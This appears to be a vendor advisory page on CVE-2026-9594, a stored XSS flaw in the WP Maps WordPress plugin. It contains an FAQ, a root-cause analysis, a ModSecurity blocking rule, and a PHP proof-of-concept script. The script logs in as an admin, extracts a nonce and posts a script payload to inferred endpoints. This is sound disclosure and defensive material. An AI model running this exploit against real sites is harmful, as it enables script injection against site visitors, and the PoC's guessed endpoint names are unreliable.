What is CVE-2026-9594?

CVE-2026-9594 is a Stored Cross-Site Scripting (XSS) vulnerability in the WP Maps plugin for WordPress, affecting versions up to and including 4.9.4. It allows authenticated users with administrator-level access to inject arbitrary scripts via the ‘location_messages’ parameter due to insufficient input sanitization.

Who is affected by this vulnerability?

Any WordPress site using the WP Maps plugin version 4.9.4 or earlier is vulnerable. Specifically, users with administrator-level access or those granted the ‘wpgmp_manage_location’ capability can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the WP Maps plugin in use. If it is version 4.9.4 or earlier, and you have users with administrative access, your site is at risk.

How can I fix CVE-2026-9594?

To fix this vulnerability, update the WP Maps plugin to the latest version where the issue is patched. Additionally, review your user roles to ensure that only trusted users have administrative capabilities.

What does the CVSS score of 4.4 indicate?

The CVSS score of 4.4 indicates a medium severity level, suggesting that while exploitation requires some level of privilege, it can still pose a significant risk if an attacker gains access to an administrative account.

What are the practical risks of this vulnerability?

If exploited, this vulnerability allows attackers to inject JavaScript into pages viewed by users, which can lead to session hijacking, data theft, or further phishing attacks. The primary risk arises from compromised admin accounts.

What is Stored Cross-Site Scripting (XSS)?

Stored XSS is a type of security vulnerability where an attacker can inject malicious scripts into a web application that are then stored and executed in the browsers of other users. This can occur when user input is not properly sanitized.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker with administrative access can log in, inject a script via the ‘location_messages’ parameter, and subsequently have that script execute when other users access the affected page.

What input sanitization measures should be implemented?

To mitigate this vulnerability, input sanitization measures such as using ‘sanitize_text_field’ for input and ‘esc_html’ for output should be implemented. This ensures that any user input is properly cleaned before being stored or displayed.

What is the 'wpgmp_manage_location' capability?

The ‘wpgmp_manage_location’ capability is a custom permission within the WP Maps plugin that allows users to manage location data. Administrators have this capability by default, but it can be assigned to other roles, increasing the risk.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, regularly update all plugins and themes, implement strict user role management, and conduct periodic security audits. Additionally, always validate and sanitize user inputs in your applications.

What should I do if I suspect exploitation?

If you suspect that your site has been exploited, immediately change all administrative passwords, review user activity logs, and check for unauthorized changes. Consider restoring from a backup if necessary.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 10, 2026

CVE-2026-9594: WP Maps <= 4.9.4 Authenticated (Admin+) Stored Cross-Site Scripting via 'location_messages' Parameter PoC, Patch Analysis & Rule

CVE ID CVE-2026-9594

Plugin wp-google-map-plugin

Severity Medium (CVSS 4.4)

CWE 79

Vulnerable Version 4.9.4

Patched Version —

Disclosed June 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-9594 (metadata-based): This vulnerability is a Stored Cross-Site Scripting (XSS) flaw in the WP Maps plugin for WordPress, affecting versions up to and including 4.9.4. The vulnerability resides in insufficient input sanitization and output escaping of the ‘location_messages’ parameter, allowing authenticated attackers with administrator-level access (or those granted the ‘wpgmp_manage_location’ capability) to inject arbitrary web scripts. The CVSS score is 4.4, reflecting a high attack complexity and privilege requirement, but with a scope change indicating potential impact beyond the vulnerable component.

The root cause, inferred from the CWE classification (CWE-79) and vulnerability description, is the plugin’s failure to properly sanitize user input when handling the ‘location_messages’ parameter before storing it in the database. Additionally, the plugin does not escape the output when rendering these messages on a page. This is a classic stored XSS pattern in WordPress plugins, where administrators can manage location data, and the plugin likely stores user-supplied messages without using functions like ‘sanitize_text_field’ or ‘wp_kses_post’ for input, and fails to apply ‘esc_html’ or similar escaping functions on output. The specific capability ‘wpgmp_manage_location’ suggests a custom role or permission system within the plugin.

Exploitation requires an authenticated user with the ‘wpgmp_manage_location’ capability, which administrators have by default. An attacker would navigate to the location editing interface, likely found under the WP Maps admin menu (e.g., /wp-admin/admin.php?page=wpgmp_manage_locations). The ‘location_messages’ parameter is likely a text field or textarea in the location form. The attacker would submit a payload containing JavaScript code, such as alert(‘XSS’), in this field. Upon submission, the payload is stored in the database. When any user (including lower-privileged users) visits a page that displays the location (e.g., through a frontend map or location listing), the injected script executes in their browser. The specific AJAX action or form processing handler is not confirmed from metadata, but plugins of this type often use admin POST or custom AJAX endpoints for location management.

The remediation for this vulnerability, as typically required for stored XSS, involves implementing proper input sanitization and output escaping. On the input side, the plugin should use WordPress functions such as ‘sanitize_text_field’ for simple text, or ‘wp_kses_post’ if HTML is allowed, to strip or encode malicious content. On the output side, when displaying the ‘location_messages’ value, the plugin must use ‘esc_html’ or ‘wp_kses_post’ to ensure any remaining HTML or JavaScript is rendered as safe text. The patch likely involves adding these filters to the save and display routines for location messages.

If exploited successfully, this vulnerability allows an attacker to inject arbitrary JavaScript into pages viewed by other users. This can lead to session hijacking, theft of cookies or authentication tokens, defacement of the WordPress site, redirection to malicious sites, or further phishing attacks. Because the attack requires administrative privileges, the primary risk is from compromised admin accounts or insider threats. However, the plugin’s custom capability system means that lower-privileged roles could inadvertently gain this capability, expanding the attack surface. The CVSS scope change (S:C) indicates that the injected script can affect resources beyond the vulnerable component, such as other plugins or themes, potentially leading to broader site compromise.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@beginsWith /wp-admin/admin-post.php" "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-9594 WP Maps Stored XSS via location_messages',severity:'CRITICAL',tag:'CVE-2026-9594'"
SecRule ARGS_POST:action "@streq wpgmp_save_location" "chain"
SecRule ARGS_POST:location_messages "@rx <script[^>]*>" "t:none,id:20261995"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-9594 - WP Maps <= 4.9.4 - Authenticated (Admin+) Stored Cross-Site Scripting via 'location_messages' Parameter

// This PoC demonstrates exploitation of stored XSS via the 'location_messages' parameter.
// The attacker must have administrative access or the 'wpgmp_manage_location' capability.
// No source code diff is available; the exact endpoint is inferred from the plugin slug and common patterns.

// Configuration
$target_url = 'http://example.com'; // Change this to the target WordPress URL
$admin_username = 'admin';           // Change this to an admin username
$admin_password = 'password';        // Change this to the admin password

// Step 1: Login to WordPress as administrator
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $admin_username,
    'pwd' => $admin_password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
$response = curl_exec($ch);

// Step 2: Access the location management page to obtain nonce and form data
$location_page_url = $target_url . '/wp-admin/admin.php?page=wpgmp_manage_locations';
curl_setopt($ch, CURLOPT_URL, $location_page_url);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$response = curl_exec($ch);

// Step 3: Extract nonce from the page (assuming a nonce named '_wpnonce' or 'wp_nonce')
preg_match('/<input[^>]+name="_wpnonce"[^>]+value="([^"]+)"/', $response, $matches);
$nonce = isset($matches[1]) ? $matches[1] : '';

if (empty($nonce)) {
    // Try alternative nonce patterns
    preg_match('/<input[^>]+name="wpgmp_nonce"[^>]+value="([^"]+)"/', $response, $matches);
    $nonce = isset($matches[1]) ? $matches[1] : '';
}

if (empty($nonce)) {
    die("Failed to extract nonce. Manual inspection of the location page may be required.n");
}

// Step 4: Submit a new location with malicious 'location_messages' parameter
$exploit_url = $target_url . '/wp-admin/admin-post.php'; // Common pattern for admin POST handlers

$malicious_message = '<script>alert("XSS")</script>'; // Simplified payload for demonstration

$post_data = array(
    'action' => 'wpgmp_save_location', // Inferred action name; may need adjustment
    '_wpnonce' => $nonce,
    'location_title' => 'Test Location',
    'location_address' => '123 Test St',
    'location_messages' => $malicious_message,
    // Other required fields as per the form, omitted for brevity
);

curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);

// Step 5: Verify the stored XSS by visiting a frontend page that displays the location
// Assuming locations are displayed on the site's 'Locations' page
$verify_url = $target_url . '/locations/';
curl_setopt($ch, CURLOPT_URL, $verify_url);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$response = curl_exec($ch);

if (strpos($response, $malicious_message) !== false) {
    echo "Stored XSS successfully injected. Payload appears in the response.n";
} else {
    echo "Could not verify payload on page. Check the location page manually.n";
}

curl_close($ch);
echo "PoC completed. Note: The exact AJAX action and form parameters may differ; this script uses inferred values.n";

Frequently Asked Questions

What is CVE-2026-9594?
Overview of the vulnerability
CVE-2026-9594 is a Stored Cross-Site Scripting (XSS) vulnerability in the WP Maps plugin for WordPress, affecting versions up to and including 4.9.4. It allows authenticated users with administrator-level access to inject arbitrary scripts via the ‘location_messages’ parameter due to insufficient input sanitization.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the WP Maps plugin version 4.9.4 or earlier is vulnerable. Specifically, users with administrator-level access or those granted the ‘wpgmp_manage_location’ capability can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to identify vulnerability
To check if your site is vulnerable, verify the version of the WP Maps plugin in use. If it is version 4.9.4 or earlier, and you have users with administrative access, your site is at risk.
How can I fix CVE-2026-9594?
Remediation steps
To fix this vulnerability, update the WP Maps plugin to the latest version where the issue is patched. Additionally, review your user roles to ensure that only trusted users have administrative capabilities.
What does the CVSS score of 4.4 indicate?
Understanding severity
The CVSS score of 4.4 indicates a medium severity level, suggesting that while exploitation requires some level of privilege, it can still pose a significant risk if an attacker gains access to an administrative account.
What are the practical risks of this vulnerability?
Potential impacts of exploitation
If exploited, this vulnerability allows attackers to inject JavaScript into pages viewed by users, which can lead to session hijacking, data theft, or further phishing attacks. The primary risk arises from compromised admin accounts.
What is Stored Cross-Site Scripting (XSS)?
Definition of XSS
Stored XSS is a type of security vulnerability where an attacker can inject malicious scripts into a web application that are then stored and executed in the browsers of other users. This can occur when user input is not properly sanitized.
How does the proof of concept demonstrate the vulnerability?
Understanding the PoC
The proof of concept illustrates how an attacker with administrative access can log in, inject a script via the ‘location_messages’ parameter, and subsequently have that script execute when other users access the affected page.
What input sanitization measures should be implemented?
Best practices for security
To mitigate this vulnerability, input sanitization measures such as using ‘sanitize_text_field’ for input and ‘esc_html’ for output should be implemented. This ensures that any user input is properly cleaned before being stored or displayed.
What is the 'wpgmp_manage_location' capability?
Understanding the custom capability
The ‘wpgmp_manage_location’ capability is a custom permission within the WP Maps plugin that allows users to manage location data. Administrators have this capability by default, but it can be assigned to other roles, increasing the risk.
How can I prevent similar vulnerabilities in the future?
Long-term security practices
To prevent similar vulnerabilities, regularly update all plugins and themes, implement strict user role management, and conduct periodic security audits. Additionally, always validate and sanitize user inputs in your applications.
What should I do if I suspect exploitation?
Immediate actions to take
If you suspect that your site has been exploited, immediately change all administrative passwords, review user activity logs, and check for unauthorized changes. Consider restoring from a backup if necessary.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations